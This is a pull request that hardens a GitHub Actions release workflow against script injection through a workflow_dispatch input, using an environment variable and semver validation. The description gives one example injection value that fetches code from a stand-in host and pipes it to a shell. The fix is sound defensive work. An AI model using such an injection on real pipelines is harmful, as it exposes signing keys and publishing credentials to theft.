### PR TITLE
Harden release workflow against script injection via release_version

### DIFF
--- a/.github/workflows/maven-central-release.yml
+++ b/.github/workflows/maven-central-release.yml
@@ -40,9 +40,21 @@ jobs:
           
       - name: Determine version
         id: version
+        env:
+          RELEASE_VERSION: ${{ github.event.inputs.release_version }}
         run: |
-          VERSION="${{ github.event.inputs.release_version }}"
-          echo "VERSION=$VERSION" >> $GITHUB_OUTPUT
+          # Do NOT interpolate the workflow input directly into the shell;
+          # read the untrusted input from an environment variable instead to
+          # avoid script injection.
+          VERSION="$RELEASE_VERSION"
+
+          # Validate against a strict semver pattern before using it anywhere.
+          if ! [[ "$VERSION" =~ ^[0-9]+\.[0-9]+\.[0-9]+(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$ ]]; then
+            echo "::error::Invalid release version '$VERSION'. Expected semver, e.g. 0.2.0 or 0.2.0-beta.1"
+            exit 1
+          fi
+
+          echo "VERSION=$VERSION" >> "$GITHUB_OUTPUT"
           echo "Releasing version: $VERSION"
           
       - name: Update POM versions


### PR DESCRIPTION
> Upstream counterpart of fork PR AndreasIgel/simple-builders-fork#1. Head branch: `AndreasIgel/simple-builders-fork:feature/154-harden-release-input` → base `java-helpers/simple-builders:main`.

## Summary

Fixes script/command injection in the Maven Central release workflow.

Fixes #154

The `Determine version` step interpolated the untrusted `workflow_dispatch` input directly into a `run:` shell block:

```yaml
run: |
  VERSION="${{ github.event.inputs.release_version }}"
```

GitHub expands `${{ ... }}` into the script text before the shell runs, so an input like `0.0.0"; curl evil | sh; echo "` executes arbitrary commands on the runner — which holds the GPG signing key and Maven Central credentials (supply-chain risk).

Change:
- Pass the input via `env: RELEASE_VERSION: ${{ github.event.inputs.release_version }}` and read `"$RELEASE_VERSION"` in the shell (env values are not expanded by the workflow templating engine).
- Validate against a strict semver regex and fail fast on mismatch. All downstream steps use `steps.version.outputs.VERSION`, which is now guaranteed to be sanitized semver.

## Validation

Workflow-only change; the Maven build is unaffected. Validated with `actionlint` (passes). Scoped to todo #1 only.